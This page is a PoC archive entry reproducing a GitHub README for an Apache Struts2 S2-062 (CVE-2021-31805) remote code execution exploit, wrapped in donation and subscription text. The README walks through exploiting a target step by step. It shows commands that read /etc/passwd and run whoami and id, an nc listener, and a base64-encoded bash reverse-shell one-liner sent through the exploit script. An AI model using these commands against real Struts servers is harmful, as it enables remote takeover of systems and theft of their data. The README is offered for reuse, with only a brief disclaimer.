Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2021-31805 PoC — Forced OGNL evaluation, when evaluated on raw not validated user input in tag attributes, may lead to RCE.

Source
https://github.com/Axx8/Struts2_S2-062_CVE-2021-31805
Associated Vulnerability
Title:Forced OGNL evaluation, when evaluated on raw not validated user input in tag attributes, may lead to RCE. (CVE-2021-31805)
Description:The fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag’s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.
Description
Apache Struts2 S2-062远程代码执行漏洞(CVE-2021-31805) | 反弹Shell
Readme
# Struts2_S2-062_CVE-2021-31805
Apache Struts2 S2-062远程代码执行漏洞(CVE-2021-31805)  | 反弹Shell
# 漏洞复现环境

docker-compose.yml
```
version: '2'
services:
 struts2:
   image: vulhub/struts2:2.5.25
   ports:
    - "8080:8080"
```
拉取镜像启动环境
```
docker-compose up -d
```
访问地址:http://1.1.1.1:8080
# 漏洞验证脚本
```
python Struts2_S2-062_CVE-2021-31805.py http://1.1.1.1:8080/index.action "cat /etc/passwd"
```
![passwd](./images/passwd.png)
```
python Struts2_S2-062_CVE-2021-31805.py http://1.1.1.1:8080/index.action whoami
```
![root](./images/root.png)
```
python Struts2_S2-062_CVE-2021-31805.py http://1.1.1.1:8080/index.action id
```
![id](./images/id.png)
# 反弹Shell
## NC开启端口监听
```
nc -lvvp 8081
```
![NC](./images/NC.png)

构造base64编码反弹shell脚本,利用如下网站生成:https://ir0ny.top/pentest/reverse-encoder-shell.html
![base64](./images/base64.png)
## 获取Shell
```
python CVE-2021-31805_Shell.py http://1.1.1.1:8080/index.action "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvODA4MCAwPiYx}|{base64,-d}|{bash,-i}"
```
![shell](./images/shell.png)

## 成功获取Shell

![Shell_code](./images/Shell_code.png)


# 免责声明
请勿用于非法的用途,仅做安全测试,否则造成的后果与本项目无关。
注:要在正规授权情况下测试网站:日站不规范,亲人泪两行。
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →